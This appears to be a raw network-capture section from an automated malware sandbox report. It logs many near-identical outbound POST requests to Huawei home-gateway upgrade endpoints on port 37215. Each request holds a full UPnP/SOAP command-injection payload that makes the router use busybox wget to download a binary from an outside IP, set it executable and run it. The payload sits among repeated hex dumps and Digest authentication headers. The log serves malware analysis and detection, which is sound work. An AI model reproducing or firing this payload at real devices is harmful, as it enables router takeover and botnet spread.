                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2098192.168.2.1552144157.22.84.19237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104402065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2099192.168.2.1545840157.194.183.7537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104402065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2100192.168.2.1554918122.88.124.8537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104402065 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2101192.168.2.1537848122.181.111.23537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104440928 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2102192.168.2.155772041.183.18.24637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104445934 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2103192.168.2.1553894157.204.143.21437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104502916 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2104192.168.2.1542498157.52.158.22937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104502916 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2105192.168.2.1557794121.101.182.21737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104504108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2106192.168.2.155788237.211.180.7137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104532003 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2107192.168.2.154386645.42.101.16337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104533911 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2108192.168.2.1544104122.215.172.25537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104581118 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
